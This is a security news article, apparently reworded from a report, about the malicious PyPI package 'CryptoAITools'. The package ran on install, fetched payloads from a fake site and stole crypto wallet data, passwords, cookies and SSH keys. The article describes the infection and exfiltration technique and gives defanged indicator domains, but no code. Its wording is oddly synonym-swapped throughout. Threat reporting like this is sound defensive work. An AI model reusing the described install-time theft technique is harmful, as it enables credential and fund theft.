Investigators Unveil Python Bundle Aiming Crypto Purses with Malicious Script
Cyber guards have stumbled upon a new deceitful Python bundle that poses as a digital currency exchange instrument but contains features constructed to snatch delicate information and deplete funds from victims’ digital currency purses.
The bundle, dubbed “CryptoAITools,” reportedly made its way through both Python Package Index (PyPI) and counterfeit GitHub repositories. It garnered over 1,300 installations before being eliminated from PyPI.
“The malevolent program initiated automatically once installed, aiming at both Windows and macOS platforms,” Checkmarx revealed in a fresh analysis shared with The Hacker News. “A misleading visual user interface (UI) was utilized to divert recipients’ attention while the malware conducted its malevolent operations behind the scenes.”
The bundle is tailored to unleash its malevolent actions immediately post installation by incorporating code injected into its “__init__.py” script that initially verifies if the destination system is Windows or macOS to run the appropriate edition of the malware.
Embedded within the code is a aiding function responsible for fetching and executing further payloads, thus initiating a multi-phase infecting process.
Particularly, the payloads are fetched from a forged site (“coinsw[.]app“) that promotes a digital currency exchange bot service, although it’s actually an endeavor to lend an air of legitimacy to the domain in case a programmer decides to visit it directly through a web browser.
This technique not only aids in evading detection by threat actors but also grants them the ability to enhance the malware’s functionalities easily by just altering the payloads hosted on the genuine-looking site.
An interesting facet of the infecting routine is the integration of a visual UI component that functions to distract the victims via a pseudo setup process while the malware discreetly gathers sensitive data from the systems.
“The CryptoAITools malware conducts a comprehensive data thievery operation, targeting a broad array of sensitive data on the compromised system,” Checkmarx outlined. “The primary objective is to amass any data that could facilitate the attacker in embezzling digital currency assets.”
This encompasses data from digital currency purses (Bitcoin, Ethereum, Exodus, Atomic, Electrum, etc.), saved passcodes, cookies, browsing history, digital currency extensions, SSH keys, files saved in Downloads, Documents, Desktop directories that mention digital currencies, passcodes, and financial details, and Telegram.
On Apple macOS apparatus, the thief also gathers details from Apple Notes and Stickies applications. The procured data is subsequently uploaded to the gofile[.]io service for file transfer, after which the local copy is erased.
Checkmarx also detected the threat actor distributing the identical thieving malware through a GitHub repository titled Meme Token Hunter Bot that purports to be “an AI-driven trading bot that lists all meme tokens on the Solana network and performs real-time exchanges once they are deemed secure.”
This suggests that the operation is also aiming at digital currency users who choose to copy and launch the code directly from GitHub. The repository, which remains active at present, has been forked once and favorited 10 times.
Also under the control of the operators is a Telegram group that endorses the aforesaid GitHub repository, as well as provides monthly subscriptions and technical assistance.
“This multi-platform strategy enables the attacker to reach a large audience, potentially capturing victims who might be cautious about one platform but trust another,” highlighted Checkmarx.
“The CryptoAITools malware campaign carries severe repercussions for the victims and the wider digital currency community. Users who favored or copied the deceitful ‘Meme-Token-Hunter-Bot’ repository are probable victims, significantly extending the reach of the attack.”
About Author
